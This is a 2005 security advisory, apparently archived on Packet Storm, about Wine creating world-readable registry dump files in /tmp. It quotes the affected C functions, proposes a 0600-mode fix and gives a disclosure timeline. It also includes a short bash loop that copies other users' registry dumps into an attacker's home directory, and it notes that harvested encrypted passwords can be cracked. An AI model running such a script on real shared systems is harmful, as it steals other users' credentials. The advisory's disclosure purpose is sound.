exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ZH2005-02SA.txt

ZH2005-02SA.txt
Posted Mar 17, 2005
Authored by Giovanni Delvecchio | Site zone-h.org

Wine versions 2005021 and below are susceptible to an insecure /tmp file creation flaw.

tags | exploit
SHA-256 | 86742930b5f70ab2a1840474db279a3dfdac3bd9bc514d58f39b9d20445df058

ZH2005-02SA.txt

Change Mirror Download


[ZH2005-02SA] Insecure tmp file creation in Wine

03/13/2005

Title: Insecure tmp file creation in Wine

Author: Giovanni Delvecchio
e-mail: badpenguin@zone-h.org

Version affected : Wine 20050211 and previous releases



About Wine
========
from http://www.winehq.org/site/docs/wine-faq/index :

Wine is a program which allows the operation of DOS and MS Windows programs (Windows 3.x and Win32 executables) on UNIX operating systems such as Linux. It consists of a program loader, which loads and executes a Windows binary, and a set of libraries that implements Windows API calls using their UNIX or X11 equivalents. The libraries may also be used for porting Win32 code into native UNIX executables, often without many changes in the source. Wine is free software, and its license (contained in the file LICENSE in each distribution) is the LGPL.



Problem
======

When a win32 application is launched by wine, wine makes a dump of the windows registry in /tmp with name regxxxxyyyy.tmp , where xxxxxx is the pid in hexadecimal value of the current wine process and yyyy is an integer value usually equal to zero.

regxxxxyyyy.tmp is created with 0644 ( -rw-r--r-- )permissions.
This could represent a security problem in a multi-user environment.
Indeed, any local user could access to windows regstry's dump and get sensitive information, like passwords and other private data.



Details
=======

The functions affected are _get_tmp_fn(FILE **) in $winerelease/misc/registry.c and
save_branch( struct key *key, const char *path ) in $winerelease/server/registry.c

_get_tmp_fn(FILE **) @ $winerelease/misc/registry.c :
-----------------------------------------------------
static LPSTR _get_tmp_fn(FILE **f)
{
LPSTR ret;
int tmp_fd,count;

ret = _xmalloc(50);
for (count = 0;;) {
sprintf(ret,"/tmp/reg%lx%04x.tmp",(long)getpid(),count++);

//here file regxxxyyyy.tmp is not created with secure permssions
if ((tmp_fd = open(ret,O_CREAT | O_EXCL | O_WRONLY,0666)) != -1) break;
if (errno != EEXIST) {
ERR("Unexpected error while open() call: %s\n",strerror(errno));
free(ret);
*f = NULL;
return NULL;
}
}
------------------------------------------------------


save_branch( struct key *,const char * ) @ $winerelease/server/registry.c:
------------------------------------------------------

static int save_branch( struct key *key, const char *path )
{
struct stat st;
char *p, *real, *tmp = NULL;
int fd, count = 0, ret = 0, by_symlink;
FILE *f;
.
.
.
for (;;)
{
sprintf( p, "reg%lx%04x.tmp", (long) getpid(), count++ );
//here file regxxxyyyy.tmp is not created with secure permssions
if ((fd = open( tmp, O_CREAT | O_EXCL | O_WRONLY, 0666 )) != -1) break;
if (errno != EEXIST) goto done;
close( fd );
}

.
.
.
}

------------------------------------------------------


When regxxxyyyy.tmp is created by open(), 0666 mode is used as argument.
Since default umask is 022 ==> (0666) &~ (022) = 0644 = -rw-r--r-- the file will be created with 0644 permissions.



Proof of Concepts
=================

To expoloit this bug, a local attacker could use a bash script to check the presence of regxxxyyyy.tmp in /tmp and copy it in his home directory for a successive analysis.


Example of bash script:

----------------------------------------------

#!/bin/sh

count=1
while [ true ]; do
if [ -f /tmp/reg*.tmp ]; then
cp /tmp/reg* /home/attacker/reg$count
count=$(($count + 1))
sleep 1
fi
done

---------------------------------------------


I have made some tests to reproduce this bug, running several applications and i noted that has been possible get sensitive information like:

_______________________________________________________

[Software\\Microsoft\\Protected Storage System Provider\\*Default*\\Data\\b9819c52-1e12-4bbd-91e7-af9afea5b02d
\\87f5aab7-ca62-41c5-8896-27714d7b7e73\\MARSUSERPROTECTEDINFO]
"Behavior"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx
"Item Data"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx

_______________________________________________________


-------------------------------------------------------
[Software\\Microsoft\\Protected Storage System Provider\\*Default*\\Data\\220d5cc1-853a-11d0-84bc-00c04fd43f8f
\\417e2d75-84bd-11d0-84bb-00c04fd43f8f\\HotmailCC990760]
"Behavior"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx
"Item Data"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx

-------------------------------------------------------

and

-------------------------------------------------------

[Software\\Microsoft\\Internet Account Manager\\Accounts\\00000008]
"Account Name"="libero.it"
"Connection Type"=dword:00000003
"POP3 Server"="pop3.libero.it"
"POP3 User Name"="xxxxxxx"
"POP3 Password2"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx
"POP3 Prompt for Password"=dword:00000000
"SMTP Server"="mail.libero.it"
"SMTP Display Name"="xxxxxx"
"SMTP Email Address"="xxxxxx@libero.it"
"POP3 Skip Account"=dword:00000000
"POP3 Port"=dword:0000006e
"SMTP User Name"=""
"SMTP Password2"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx
"SMTP Use Sicily"=dword:00000000
"SMTP Prompt for Password"=dword:00000000


-------------------------------------------------------

where there were MSN Explorer and outlook's passwords encrypted.

Note that also if they are encrypted, they could be imported on the windows
registry system of the attacker and so gain illegal access with victim's account, or using one of many tools availble on the net to "crack" such encrypted password.



Solution:
========

A fix for this problem could be call the function open() using 0600 mode:

... open(ret,O_CREAT | O_EXCL | O_WRONLY,0600)) ....

I have provided a possible patch :
donwload the patch file from http://www.zone-h.org/download/file=5374/ in your wine sources directory and launch:

gzip -cd wine_registry_patch.tar.gz | patch -p1



Timeline
========
11th February 2005 - Bug dicovered
12th February 2005 - Wine contacted by wine-bugs@winehq.org
13th March 2005 - Public advisory

Note: 10th March 2005 - Wine20050310 has been released, but the problem has not been fixed yet .



Reference:
=========
http://www.zone-h.org/advisories/read/id=7300
http://bugs.winehq.org/show_bug.cgi?id=2715
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close